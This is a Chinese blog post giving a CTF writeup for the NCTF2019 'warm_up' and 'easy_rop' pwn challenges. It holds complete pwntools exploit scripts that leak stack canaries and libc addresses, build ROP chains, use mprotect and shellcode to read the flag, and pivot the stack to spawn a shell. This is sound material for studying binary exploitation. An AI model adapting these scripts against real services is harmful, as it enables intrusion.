NCTF2019 -- PWN部分writeup

最新推荐文章于 2024-09-27 13:44:47 发布
最新推荐文章于 2024-09-27 13:44:47 发布
阅读量1.2k 收藏
点赞数
分类专栏: pwn 文章标签: pwn NCTF2019 easy rop warm up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41988448/article/details/103273612
版权

pwn学习总结(二) —— PWN部分writeup

warmup

查看程序防护
checksec
查看反汇编
main
sub_400a06
sub_400ab6
已知条件

  1. 开启了溢出检测
  2. 开启了沙盒模式,只能调用libc中的open | read | write等读写函数
  3. 可以通过leak canary绕过溢出检测

EXP

#-*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"

elf  = ELF('./warm_up')
libc = ELF('./libc-2.23.so')

r = remote('139.129.76.65', 50007)

r.recvuntil('warm up!!!\n')
#距离canary24个字节,换行符0x0a会占据canary最后一个字节,使得canary发生泄露
r.sendline('a'*24)
r.recv(25)  #丢弃前25个字节,包括用于泄露canary的'\x0a'
canary = '\x00' + r.recv(7)
print(hex(u64(canary)))

pop_rdi_ret     = 0x400bc3
pop_rsi_r15_ret = 0x400bc1
start_addr      = 0x400910
bss_addr        = elf.bss()
puts_plt        = elf.symbols['puts']
libc_start_main_got = elf.got['__libc_start_main']

#leak libc
payload  = 'a'*24 + canary + 'b'*8
payload += p64(pop_rdi_ret)
payload += p64(libc_start_main_got)
payload += p64(puts_plt)
payload += p64(start_addr)

r.recvuntil(' ?')
r.sendline(payload)

libc_start_main = u64(r.recv(6).ljust(8,'\x00'))
#print('libc_start_main = ' + str(hex(libc_start_main)))
libc_base = libc_start_main - libc.symbols['__libc_start_main']

gets        = libc_base + libc.symbols['gets']
mprotect    = libc_base + libc.symbols['mprotect']
pop_rdx_ret = libc_base + libc.search(asm("pop rdx\nret")).next()

r.recvuntil('warm up!!!\n')
r.sendline('a')

payload  = 'a'*0x18 + canary + 'b'*8
#向bss + 0x500位置写入shellcode
payload += p64(pop_rdi_ret) + p64(bss_addr + 0x500) + p64(gets)
#构造mprotect,更改内存保护属性
payload += p64(pop_rdx_ret)     + p64(7)                   #设置保护属性
payload += p64(pop_rsi_r15_ret) + p64(0x1500) + p64(0)     #设置大小
payload += p64(pop_rdi_ret)     + p64((bss_addr>>12)<<12)  #设置起始地址
payload += p64(mprotect)   #调用mprotect
#修改内存保护属性后,令RIP指向下方构造的shellcode
payload += p64(bss_addr + 0x500)

r.recvuntil(' ?')
r.sendline(payload)

payload  = shellcraft.open("flag")
#将远程flag文件内容写入缓冲区,open成功时返回值为3
#                          fd  address          size
payload += shellcraft.read( 3, bss_addr+0x100, 0x30)
payload += shellcraft.write(1, bss_addr+0x100, 0x30)

r.sendline(asm(payload))
r.interactive()

由于服务器在写完wp后连不上了,这里放一张本地执行成功的截图,环境:ubuntu16.04
flag

easy_rop

查看程序防护
在这里插入图片描述
查看反汇编
反汇编
调试的时候发现main函数的rbp居然是pie,而返回地址下面第四行是main函数自己的头部指针
pie
已知条件

  1. 存在栈溢出,大小为4个栈单元
  2. 开启了canary保护,可以用’+'号绕过
  3. main函数的 rbp 为 pie(基址)
  4. main函数的返回地址下面存在main函数头部指针

解题思路

  1. 使用’+'号绕过canary值
  2. 劫持pie,通过pie和静态偏移得到想要的真实地址
  3. 第一次执行main函数时,迁移rbp指向 unk_201420 - 8 的位置
    rsp指向main函数头部指针,retn后再次执行main函数
  4. 第二次执行main函数时,迁移rsp指向 unk_201420 的位置
  5. 通过main函数的read函数向unk_201420写入rop链,功能:
    1. leak libc,得到版本信息,计算system函数和’/bin/sh’字符串在libc中的偏移
    2. 调用万能gadget,进行任意函数执行,由于leak libc后要进行利用的话需要计算偏移后再次写入rop链,所以这里使用read函数在下方构造system(’/bin/sh’)即可getshell

注意:exp中没有对负数进行处理,可能需要多打几次才行

Leak Libc EXP

#-*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'

elf   = ELF('./easy_rop')

#r = process('./easy_rop')
r = remote('139.129.76.65', 50002)

'''first main'''
r.recvuntil('number 0: ')
#bypass canary
for i in range(0,30):
	r.sendline('+')

#get pie
r.recvuntil('number 28 = ')
pie_l8 = int(r.recvuntil('\n',True), 10)
r.recvuntil('number 29 = ')
pie_h8  = int(r.recvuntil('\n',True), 10)
pie = (pie_h8 << 32) + pie_l8 - 0xb40

def send64(num):
	#low  4byte
	if num % 0x100000000 > 0x7fffffff:
		r.sendlineafter(':', str((-1 * num) % 0x100000000))
	else:
		r.sendlineafter(':', str(num % 0x100000000))
	#high 4byte
	r.sendlineafter(':', str(num >> 32))

new_stack      = pie + 0x201420 - 8
pop_rdi_ret    = pie + 0xba3
general_gadget = pie + 0xb80
leave_ret      = pie + 0xb31
pop_rbp_r14_r15_ret = pie + 0xb9f
pop_rbx_rbp_r12_r13_r14_r15_ret = pie + 0xb9a

#return to main
#the end rsp point to the main
send64(pop_rbp_r14_r15_ret)
#rbp to new stack
send64(new_stack)
r.sendlineafter('name?\n', '1')

'''secend main'''
r.recvuntil('number 0: ')
for i in range(0,28):
	r.sendline('+')

#rsp to new stack
#rbp to new stack-8(pie + 0x201420)
send64(new_stack)	#number 28 & 29 -- rbp
send64(leave_ret)	#number 30 & 31 -- return address
r.sendlineafter('number 32: ','++')  # number 32 & 33

r.recvuntil('name?\n',True)
#leak libc
payload  = p64(pop_rdi_ret)
payload += p64(pie + elf.got['__libc_start_main'])
payload += p64(pie + elf.plt['puts'])

r.sendline(payload)
libc_start_main = u64(r.recv(6).ljust(8, '\x00'))
print('libc_start_main = ' + hex(libc_start_main))

r.interactive()

leak_libc
通过后三位偏移,使用在线网站libc database search搜索libc版本
libc_database_search
Getshell EXP
本地一直无法成功,连上服务器能够成功getshell,暂时未定位到问题所在

#-*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'

elf   = ELF('./easy_rop')

#r = process('./easy_rop')
r = remote('139.129.76.65', 50002)

'''first main'''
r.recvuntil('number 0: ')
#bypass canary
for i in range(0,30):
	r.sendline('+')

#get pie
r.recvuntil('number 28 = ')
pie_l8 = int(r.recvuntil('\n',True), 10)
r.recvuntil('number 29 = ')
pie_h8  = int(r.recvuntil('\n',True), 10)
pie = (pie_h8 << 32) + pie_l8 - 0xb40

def send64(num):
	#low  4byte
	if num % 0x100000000 > 0x7fffffff:
		r.sendlineafter(':', str((-1 * num) % 0x100000000))
	else:
		r.sendlineafter(':', str(num % 0x100000000))
	#high 4byte
	r.sendlineafter(':', str(num >> 32))

new_stack      = pie + 0x201420 - 8
pop_rdi_ret    = pie + 0xba3
general_gadget = pie + 0xb80
leave_ret      = pie + 0xb31
pop_rbp_r14_r15_ret = pie + 0xb9f
pop_rbx_rbp_r12_r13_r14_r15_ret = pie + 0xb9a

#return to main
#the end rsp point to the main
send64(pop_rbp_r14_r15_ret)
#rbp to new stack
send64(new_stack)
r.sendlineafter('name?\n', '1')

'''secend main'''
r.recvuntil('number 0: ')
for i in range(0,28):
	r.sendline('+')

#rsp to new stack
#rbp to new stack-8(pie + 0x201420)
send64(new_stack)	#number 28 & 29 -- rbp
send64(leave_ret)	#number 30 & 31 -- return address
r.sendlineafter('number 32: ','++')  # number 32 & 33

r.recvuntil('name?\n',True)
#leak libc
payload  = p64(pop_rdi_ret)
payload += p64(pie + elf.got['__libc_start_main'])
payload += p64(pie + elf.plt['puts'])

#general gadget
payload += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
#          0        1        function                     parameter3   parameter2           parameter1
payload += p64(0) + p64(1) + p64(pie + elf.got['read']) + p64(0x666) + p64(new_stack + 8) + p64(0)
payload += p64(general_gadget) #general gadget address

r.sendline(payload)
#get libc_start_main
libc_start_main = u64(r.recv(6).ljust(8, '\x00'))
#print('libc_start_main = ' + hex(libc_start_main))
system_addr = libc_start_main + 0x24c50
bin_sh      = libc_start_main + 0x16c617

payload  = 'a'*80		#rsp offset
payload += p64(pop_rdi_ret)
payload += p64(bin_sh)
payload += p64(system_addr)

r.sendline(payload)
r.interactive()
lzyddf
关注
专栏目录
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
攻防世界 pwn进阶区解法 write up(一)
qq_46441427的博客
03-01 418
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
PWN 基础篇 Write Up
qq_61553520的博客
10-02 572
data 信息第一句定义了一个名为_data的数据段。segment关键字用于声明一个新的段,dword表示每个数据元素的大小为 4 字节,public表示该段可以在其他模块中访问,'DATA'是标识符,用于标识数据段。第二句则是将代码段(.text)的默认段寄存器cs和数据段(.data)的_data段寄存器进行关联。assume关键字用于指定段寄存器与段的关系,在这里它指定了cs寄存器与_data段寄存器的关联。通过这两句指令,我们可以确保在程序运行时,使用cs寄存器来访问_data段。
[NCTF2019]SQLi 1 详解 以及 regexp 布尔盲注爆破脚本深度解析与改进
最新发布
weixin_47623063的博客
09-27 742
regxp bool注入;dirmap目录扫描;bool盲注爆破脚本;[NCTF2019]SQLi 1
攻防世界新手pwnwriteup
thinker11的博客
01-28 1603
level2 1.查壳 2.IDA分析 进入vulnerable_function函数 读入的值明显大于buf自身的大小 又有system函数,就差/bin/sh了 接下来我们 SHIFT+F12 双击system函数,得到地址 0x8048320 双击binsh,得到地址 0x0804a024 双击buf,得到buf到返回地址的偏移 0x88+4=140 3.EXP from pwn ...
2024年春秋杯夏季赛pwn-Writeup
x528935893的博客
07-09 2144
当我们输入3的时候就会进入sub_1CFB函数中,我们进入函数发现他会将我们输入的第一个字节的数取出来作为funcs_1B86函数的偏移,然后在a1 x02808的地方加一。4、第三个参数,我们要算偏移,然后我们输入的第三个参数加上0x502,之后可以得到我们第四个字节的内容(我们通过观察,我们只要让最后的数值为0x104就可以拿到第四字节的)我们进入sub_189C函数,发现他会在我们输入的数值最后加上一个\x00,我们就可以通过这个特性来绕过密码的判断,因为是通过strlen来判断长度的,
强网杯ctf pwn&re writeup (部分
这里没人
06-04 7196
打了2天的强网杯,虽然一度冲进了前10。可惜最后的时候还是掉出了20名。最后只能无奈打出GG。其中的原因有很多,也不想多说了。 逆向溢出题3连发。我就只会那么多了Orz 先来一道re200 kergen 发送24位的字符串,主要是400B56处的检验函数。检验方法是这样的先是发送字符的第1 10 7 11 2 13 16 17位,中间插入43917202。然后MD5,然后转化成32位字符串形
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
超微X11SPH-NCTPF主板用户手册
04-01
超微X11SPH-NCTPF主板用户手册
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
XDCTF PWN300&400 Writeup
这里没人
05-14 751
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
PolarCTF 2024冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言
Python毕设源码程序王哥
04-12 938
(2)然后,查看del_note()函数该函数根据用户输入的 Index 值来确定删除哪一个note,第二个红框中,对存放note和puts函数的内存空间都进行了释放,但没有将指针置空,存在漏洞可以发现,题目给出的程序存在后门函数magic,通过执行该函数可以获取flag。那么,可以尝试将del_note()函数中未置空的指针指向magic函数的地址,进而执行该后门函数。
Bugku旧平台pwn writeup
a370793934的专栏
11-28 799
Pwn1 nc 114.116.54.89 10001 连上cat flag: flag{6979d853add353c9} Pwn2 #!/usr/bin/env python3 # -*- coding:utf-8 -*- from pwn import * context.log_level='debug' p = process("./pwn2") #p = re...
【CTF Pwn】CTFShow PWN签到题 Writeup(nc)
HEX9CF的技术博客
04-29 965
1PWN签到。
XSCTF联合招新赛(热身赛)babystack & easyrop
红叶的博客
10-29 1975
开启了栈不可执行,但是在 IDA Pro 中发现了backdoor函数。
绿盟杯NSCTF(CCTF)2017 pwn writeup
jmp esp
07-22 6108
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main() { alarm(0x1u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
鹤城杯PWN几道题的writeup
10-09 616
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值